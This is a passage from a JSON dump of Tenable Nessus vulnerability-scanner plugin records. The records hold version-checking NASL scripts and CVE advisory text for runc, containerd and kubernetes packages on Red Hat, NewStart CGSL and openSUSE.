value:\"p-cpe:/a:redhat:enterprise_linux:buildah\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:buildah-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:container-selinux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:containernetworking-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:containernetworking-plugins-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:containers-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:fuse-overlayfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:fuse-overlayfs-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:oci-systemd-hook\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:oci-systemd-hook-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:oci-umount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:oci-umount-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:podman\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:podman-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:podman-docker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:runc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:runc-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:skopeo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:skopeo-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:slirp4netns\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:slirp4netns-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 8.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nmodule_ver = get_kb_item('Host/RedHat/appstream/container-tools');\nif (isnull(module_ver)) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module container-tools:1.0');\nif ('1.0' >!< module_ver) audit(AUDIT_PACKAGE_NOT_AFFECTED, 'Module container-tools:' + module_ver);\n\nappstreams = {\n 'container-tools:1.0': [\n {'reference':'buildah-1.5-6.gite94b4f9.module+el8.1.0+4908+72a45cef', 'cpu':'aarch64', 'release':'8'},\n {'reference':'buildah-1.5-6.gite94b4f9.module+el8.1.0+4908+72a45cef', 'cpu':'s390x', 'release':'8'},\n {'reference':'buildah-1.5-6.gite94b4f9.module+el8.1.0+4908+72a45cef', 'cpu':'x86_64', 'release':'8'},\n {'reference':'buildah-debugsource-1.5-6.gite94b4f9.module+el8.1.0+4908+72a45cef', 'cpu':'aarch64', 'release':'8'},\n {'reference':'buildah-debugsource-1.5-6.gite94b4f9.module+el8.1.0+4908+72a45cef', 'cpu':'s390x', 'release':'8'},\n {'reference':'buildah-debugsource-1.5-6.gite94b4f9.module+el8.1.0+4908+72a45cef', 'cpu':'x86_64', 'release':'8'},\n {'reference':'container-selinux-2.94-1.git1e99f1d.module+el8.1.0+3468+011f0ab0', 'release':'8', 'epoch':'2'},\n {'reference':'containernetworking-plugins-0.7.4-4.git9ebe139.module+el8.1.0+4908+72a45cef', 'cpu':'aarch64', 'release':'8'},\n {'reference':'containernetworking-plugins-0.7.4-4.git9ebe139.module+el8.1.0+4908+72a45cef', 'cpu':'s390x', 'release':'8'},\n {'reference':'containernetworking-plugins-0.7.4-4.git9ebe139.module+el8.1.0+4908+72a45cef', 'cpu':'x86_64', 'release':'8'},\n {'reference':'containernetworking-plugins-debugsource-0.7.4-4.git9ebe139.module+el8.1.0+4908+72a45cef', 'cpu':'aarch64', 'release':'8'},\n {'reference':'containernetworking-plugins-debugsource-0.7.4-4.git9ebe139.module+el8.1.0+4908+72a45cef', 'cpu':'s390x', 'release':'8'},\n {'reference':'containernetworking-plugins-debugsource-0.7.4-4.git9ebe139.module+el8.1.0+4908+72a45cef', 'cpu':'x86_64', 'release':'8'},\n {'reference':'containers-common-0.1.32-6.git1715c90.module+el8.1.0+4903+9bde5d6c', 'cpu':'aarch64', 'release':'8', 'epoch':'1'},\n {'reference':'containers-common-0.1.32-6.git1715c90.module+el8.1.0+4903+9bde5d6c', 'cpu':'s390x', 'release':'8', 'epoch':'1'},\n {'reference':'containers-common-0.1.32-6.git1715c90.module+el8.1.0+4903+9bde5d6c', 'cpu':'x86_64', 'release':'8', 'epoch':'1'},\n {'reference':'fuse-overlayfs-0.3-5.module+el8.1.0+3468+011f0ab0', 'cpu':'aarch64', 'release':'8'},\n {'reference':'fuse-overlayfs-0.3-5.module+el8.1.0+3468+011f0ab0', 'cpu':'s390x', 'release':'8'},\n {'reference':'fuse-overlayfs-0.3-5.module+el8.1.0+3468+011f0ab0', 'cpu':'x86_64', 'release':'8'},\n {'reference':'fuse-overlayfs-debugsource-0.3-5.module+el8.1.0+3468+011f0ab0', 'cpu':'aarch64', 'release':'8'},\n {'reference':'fuse-overlayfs-debugsource-0.3-5.module+el8.1.0+3468+011f0ab0', 'cpu':'s390x', 'release':'8'},\n {'reference':'fuse-overlayfs-debugsource-0.3-5.module+el8.1.0+3468+011f0ab0', 'cpu':'x86_64', 'release':'8'},\n {'reference':'oci-systemd-hook-0.1.15-2.git2d0b8a3.module+el8.1.0+3468+011f0ab0', 'cpu':'aarch64', 'release':'8', 'epoch':'1'},\n {'reference':'oci-systemd-hook-0.1.15-2.git2d0b8a3.module+el8.1.0+3468+011f0ab0', 'cpu':'s390x', 'release':'8', 'epoch':'1'},\n {'reference':'oci-systemd-hook-0.1.15-2.git2d0b8a3.module+el8.1.0+3468+011f0ab0', 'cpu':'x86_64', 'release':'8', 'epoch':'1'},\n {'reference':'oci-systemd-hook-debugsource-0.1.15-2.git2d0b8a3.module+el8.1.0+3468+011f0ab0', 'cpu':'aarch64', 'release':'8', 'epoch':'1'},\n {'reference':'oci-systemd-hook-debugsource-0.1.15-2.git2d0b8a3.module+el8.1.0+3468+011f0ab0', 'cpu':'s390x', 'release':'8', 'epoch':'1'},\n {'reference':'oci-systemd-hook-debugsource-0.1.15-2.git2d0b8a3.module+el8.1.0+3468+011f0ab0', 'cpu':'x86_64', 'release':'8', 'epoch':'1'},\n {'reference':'oci-umount-2.3.4-2.git87f9237.module+el8.1.0+3468+011f0ab0', 'cpu':'aarch64', 'release':'8', 'epoch':'2'},\n {'reference':'oci-umount-2.3.4-2.git87f9237.module+el8.1.0+3468+011f0ab0', 'cpu':'s390x', 'release':'8', 'epoch':'2'},\n {'reference':'oci-umount-2.3.4-2.git87f9237.module+el8.1.0+3468+011f0ab0', 'cpu':'x86_64', 'release':'8', 'epoch':'2'},\n {'reference':'oci-umount-debugsource-2.3.4-2.git87f9237.module+el8.1.0+3468+011f0ab0', 'cpu':'aarch64', 'release':'8', 'epoch':'2'},\n {'reference':'oci-umount-debugsource-2.3.4-2.git87f9237.module+el8.1.0+3468+011f0ab0', 'cpu':'s390x', 'release':'8', 'epoch':'2'},\n {'reference':'oci-umount-debugsource-2.3.4-2.git87f9237.module+el8.1.0+3468+011f0ab0', 'cpu':'x86_64', 'release':'8', 'epoch':'2'},\n {'reference':'podman-1.0.0-4.git921f98f.module+el8.1.0+4908+72a45cef', 'cpu':'aarch64', 'release':'8'},\n {'reference':'podman-1.0.0-4.git921f98f.module+el8.1.0+4908+72a45cef', 'cpu':'s390x', 'release':'8'},\n {'reference':'podman-1.0.0-4.git921f98f.module+el8.1.0+4908+72a45cef', 'cpu':'x86_64', 'release':'8'},\n {'reference':'podman-debugsource-1.0.0-4.git921f98f.module+el8.1.0+4908+72a45cef', 'cpu':'aarch64', 'release':'8'},\n {'reference':'podman-debugsource-1.0.0-4.git921f98f.module+el8.1.0+4908+72a45cef', 'cpu':'s390x', 'release':'8'},\n {'reference':'podman-debugsource-1.0.0-4.git921f98f.module+el8.1.0+4908+72a45cef', 'cpu':'x86_64', 'release':'8'},\n {'reference':'podman-docker-1.0.0-4.git921f98f.module+el8.1.0+4908+72a45cef', 'release':'8'},\n {'reference':'runc-1.0.0-56.rc5.dev.git2abd837.module+el8.1.0+4908+72a45cef', 'cpu':'aarch64', 'release':'8'},\n {'reference':'runc-1.0.0-56.rc5.dev.git2abd837.module+el8.1.0+4908+72a45cef', 'cpu':'s390x', 'release':'8'},\n {'reference':'runc-1.0.0-56.rc5.dev.git2abd837.module+el8.1.0+4908+72a45cef', 'cpu':'x86_64', 'release':'8'},\n {'reference':'runc-debugsource-1.0.0-56.rc5.dev.git2abd837.module+el8.1.0+4908+72a45cef', 'cpu':'aarch64', 'release':'8'},\n {'reference':'runc-debugsource-1.0.0-56.rc5.dev.git2abd837.module+el8.1.0+4908+72a45cef', 'cpu':'s390x', 'release':'8'},\n {'reference':'runc-debugsource-1.0.0-56.rc5.dev.git2abd837.module+el8.1.0+4908+72a45cef', 'cpu':'x86_64', 'release':'8'},\n {'reference':'skopeo-0.1.32-6.git1715c90.module+el8.1.0+4903+9bde5d6c', 'cpu':'aarch64', 'release':'8', 'epoch':'1'},\n {'reference':'skopeo-0.1.32-6.git1715c90.module+el8.1.0+4903+9bde5d6c', 'cpu':'s390x', 'release':'8', 'epoch':'1'},\n {'reference':'skopeo-0.1.32-6.git1715c90.module+el8.1.0+4903+9bde5d6c', 'cpu':'x86_64', 'release':'8', 'epoch':'1'},\n {'reference':'skopeo-debugsource-0.1.32-6.git1715c90.module+el8.1.0+4903+9bde5d6c', 'cpu':'aarch64', 'release':'8', 'epoch':'1'},\n {'reference':'skopeo-debugsource-0.1.32-6.git1715c90.module+el8.1.0+4903+9bde5d6c', 'cpu':'s390x', 'release':'8', 'epoch':'1'},\n {'reference':'skopeo-debugsource-0.1.32-6.git1715c90.module+el8.1.0+4903+9bde5d6c', 'cpu':'x86_64', 'release':'8', 'epoch':'1'},\n {'reference':'slirp4netns-0.1-3.dev.gitc4e1bc5.module+el8.1.0+4308+9d868e48', 'cpu':'aarch64', 'release':'8'},\n {'reference':'slirp4netns-0.1-3.dev.gitc4e1bc5.module+el8.1.0+4308+9d868e48', 'cpu':'s390x', 'release':'8'},\n {'reference':'slirp4netns-0.1-3.dev.gitc4e1bc5.module+el8.1.0+4308+9d868e48', 'cpu':'x86_64', 'release':'8'},\n {'reference':'slirp4netns-debugsource-0.1-3.dev.gitc4e1bc5.module+el8.1.0+4308+9d868e48', 'cpu':'aarch64', 'release':'8'},\n {'reference':'slirp4netns-debugsource-0.1-3.dev.gitc4e1bc5.module+el8.1.0+4308+9d868e48', 'cpu':'s390x', 'release':'8'},\n {'reference':'slirp4netns-debugsource-0.1-3.dev.gitc4e1bc5.module+el8.1.0+4308+9d868e48', 'cpu':'x86_64', 'release':'8'}\n ],\n};\n\nflag = 0;\nappstreams_found = 0;\nforeach module (keys(appstreams)) {\n appstream = NULL;\n appstream_name = NULL;\n appstream_version = NULL;\n appstream_split = split(module, sep:':', keep:FALSE);\n if (!empty_or_null(appstream_split)) {\n appstream_name = appstream_split[0];\n appstream_version = appstream_split[1];\n if (!empty_or_null(appstream_name)) appstream = get_one_kb_item('Host/RedHat/appstream/' + appstream_name);\n }\n if (!empty_or_null(appstream) && appstream_version == appstream || appstream_name == 'all') {\n appstreams_found++;\n foreach package_array ( appstreams[module] ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n }\n }\n}\n\nif (!appstreams_found) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module container-tools:1.0');\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'buildah / buildah-debugsource / container-selinux / etc');\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-02-12T15:10:16", "description": "The remote NewStart CGSL host, running version CORE 5.04 / MAIN 5.04, has containerd.io packages installed that are affected by multiple vulnerabilities:\n\n - runc through 1.0.0-rc8, as used in Docker through 19.03.2-ce and other products, allows AppArmor restriction bypass because libcontainer/rootfs_linux.go incorrectly checks mount targets, and thus a malicious Docker image can mount over a /proc directory. (CVE-2019-16884)\n\n - runc through 1.0-rc6, as used in Docker before 18.09.2 and other products, allows attackers to overwrite the host runc binary (and consequently obtain host root access) by leveraging the ability to execute a command as root within one of these types of containers: (1) a new container with an attacker-controlled image, or (2) an existing container, to which the attacker previously had write access, that can be attached with docker exec. This occurs because of file-descriptor mishandling, related to /proc/self/exe.\n (CVE-2019-5736)\n\n - Some HTTP/2 implementations are vulnerable to ping floods, potentially leading to a denial of service. The attacker sends continual pings to an HTTP/2 peer, causing the peer to build an internal queue of responses. Depending on how efficiently this data is queued, this can consume excess CPU, memory, or both.\n (CVE-2019-9512)\n\n - Some HTTP/2 implementations are vulnerable to a reset flood, potentially leading to a denial of service.\n The attacker opens a number of streams and sends an invalid request over each stream that should solicit a stream of RST_STREAM frames from the peer. Depending on how the peer queues the RST_STREAM frames, this can consume excess memory, CPU, or both. (CVE-2019-9514)\n\n - Some HTTP/2 implementations are vulnerable to a settings flood, potentially leading to a denial of service. The attacker sends a stream of SETTINGS frames to the peer. Since the RFC requires that the peer reply with one acknowledgement per SETTINGS frame, an empty SETTINGS frame is almost equivalent in behavior to a ping. Depending on how efficiently this data is queued, this can consume excess CPU, memory, or both. (CVE-2019-9515)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-03-10T00:00:00", "type": "nessus", "title": "NewStart CGSL CORE 5.04 / MAIN 5.04 : containerd.io Multiple Vulnerabilities (NS-SA-2021-0006)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16884", "CVE-2019-5736", "CVE-2019-9512", "CVE-2019-9514", "CVE-2019-9515"], "modified": "2022-12-05T00:00:00", "cpe": [], "id": "NEWSTART_CGSL_NS-SA-2021-0006_CONTAINERD_IO.NASL", "href": "https://www.tenable.com/plugins/nessus/147293", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from ZTE advisory NS-SA-2021-0006. The text\n# itself is copyright (C) ZTE, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147293);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2019-5736\",\n \"CVE-2019-9512\",\n \"CVE-2019-9514\",\n \"CVE-2019-9515\",\n \"CVE-2019-16884\"\n );\n script_bugtraq_id(106976);\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"NewStart CGSL CORE 5.04 / MAIN 5.04 : containerd.io Multiple Vulnerabilities (NS-SA-2021-0006)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote machine is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote NewStart CGSL host, running version CORE 5.04 / MAIN 5.04, has containerd.io packages installed that are\naffected by multiple vulnerabilities:\n\n - runc through 1.0.0-rc8, as used in Docker through 19.03.2-ce and other products, allows AppArmor\n restriction bypass because libcontainer/rootfs_linux.go incorrectly checks mount targets, and thus a\n malicious Docker image can mount over a /proc directory. (CVE-2019-16884)\n\n - runc through 1.0-rc6, as used in Docker before 18.09.2 and other products, allows attackers to overwrite\n the host runc binary (and consequently obtain host root access) by leveraging the ability to execute a\n command as root within one of these types of containers: (1) a new container with an attacker-controlled\n image, or (2) an existing container, to which the attacker previously had write access, that can be\n attached with docker exec. This occurs because of file-descriptor mishandling, related to /proc/self/exe.\n (CVE-2019-5736)\n\n - Some HTTP/2 implementations are vulnerable to ping floods, potentially leading to a denial of service. The\n attacker sends continual pings to an HTTP/2 peer, causing the peer to build an internal queue of\n responses. Depending on how efficiently this data is queued, this can consume excess CPU, memory, or both.\n (CVE-2019-9512)\n\n - Some HTTP/2 implementations are vulnerable to a reset flood, potentially leading to a denial of service.\n The attacker opens a number of streams and sends an invalid request over each stream that should solicit a\n stream of RST_STREAM frames from the peer. Depending on how the peer queues the RST_STREAM frames, this\n can consume excess memory, CPU, or both. (CVE-2019-9514)\n\n - Some HTTP/2 implementations are vulnerable to a settings flood, potentially leading to a denial of\n service. The attacker sends a stream of SETTINGS frames to the peer. Since the RFC requires that the peer\n reply with one acknowledgement per SETTINGS frame, an empty SETTINGS frame is almost equivalent in\n behavior to a ping. Depending on how efficiently this data is queued, this can consume excess CPU, memory,\n or both. (CVE-2019-9515)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/notice/NS-SA-2021-0006\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the vulnerable CGSL containerd.io packages. Note that updated packages may not be available yet. Please contact\nZTE for more information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-5736\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Docker Container Escape Via runC Overwrite');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"NewStart CGSL Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/ZTE-CGSL/release\", \"Host/ZTE-CGSL/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/ZTE-CGSL/release');\nif (isnull(release) || release !~ \"^CGSL (MAIN|CORE)\") audit(AUDIT_OS_NOT, 'NewStart Carrier Grade Server Linux');\n\nif (release !~ \"CGSL CORE 5.04\" &&\n release !~ \"CGSL MAIN 5.04\")\n audit(AUDIT_OS_NOT, 'NewStart CGSL CORE 5.04 / NewStart CGSL MAIN 5.04');\n\nif (!get_kb_item('Host/ZTE-CGSL/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'NewStart Carrier Grade Server Linux', cpu);\n\nflag = 0;\n\npkgs = {\n 'CGSL CORE 5.04': [\n 'containerd.io-1.2.13-1.el7.200814164614git76a9926'\n ],\n 'CGSL MAIN 5.04': [\n 'containerd.io-1.2.13-1.el7.200814164614git76a9926'\n ]\n};\npkg_list = pkgs[release];\n\nforeach (pkg in pkg_list)\n if (rpm_check(release:'ZTE ' + release, reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'containerd.io');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:11:58", "description": "This update introduces kubernetes version 1.14.1 and cri-o 1.17.1 to Leap 15.1.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-27T00:00:00", "type": "nessus", "title": "openSUSE Security Update : kubernetes (openSUSE-2020-554) (Dirty COW)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5195", "CVE-2016-8859", "CVE-2017-1002101", "CVE-2018-1002105", "CVE-2018-16873", "CVE-2018-16874", "CVE-2019-10214"], "modified": "2022-03-09T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:cri-o", "p-cpe:/a:novell:opensuse:cri-o-kubeadm-criconfig", "p-cpe:/a:novell:opensuse:cri-tools", "p-cpe:/a:novell:opensuse:go1.14", "p-cpe:/a:novell:opensuse:go1.14-race", "p-cpe:/a:novell:opensuse:kubernetes-apiserver", "p-cpe:/a:novell:opensuse:kubernetes-client", "p-cpe:/a:novell:opensuse:kubernetes-controller-manager", "p-cpe:/a:novell:opensuse:kubernetes-kubeadm", "p-cpe:/a:novell:opensuse:kubernetes-kubelet-common", "p-cpe:/a:novell:opensuse:kubernetes-kubelet1.17", "p-cpe:/a:novell:opensuse:kubernetes-kubelet1.18", "p-cpe:/a:novell:opensuse:kubernetes-master", "p-cpe:/a:novell:opensuse:kubernetes-node", "p-cpe:/a:novell:opensuse:kubernetes-proxy", "p-cpe:/a:novell:opensuse:kubernetes-scheduler", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2020-554.NASL", "href": "https://www.tenable.com/plugins/nessus/136011", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-554.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(136011);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/09\");\n\n script_cve_id(\"CVE-2016-5195\", \"CVE-2016-8859\", \"CVE-2017-1002101\", \"CVE-2018-1002105\", \"CVE-2018-16873\", \"CVE-2018-16874\", \"CVE-2019-10214\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"openSUSE Security Update : kubernetes (openSUSE-2020-554) (Dirty COW)\");\n script_summary(english:\"Check for the openSUSE-2020-554 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update introduces kubernetes version 1.14.1 and cri-o 1.17.1 to\nLeap 15.1.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1039663\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1042383\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1042387\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1057277\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1059207\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1061027\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1065972\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1069469\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1084765\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1084766\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1085009\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1086185\"\n );\n script_set_attribute(\n 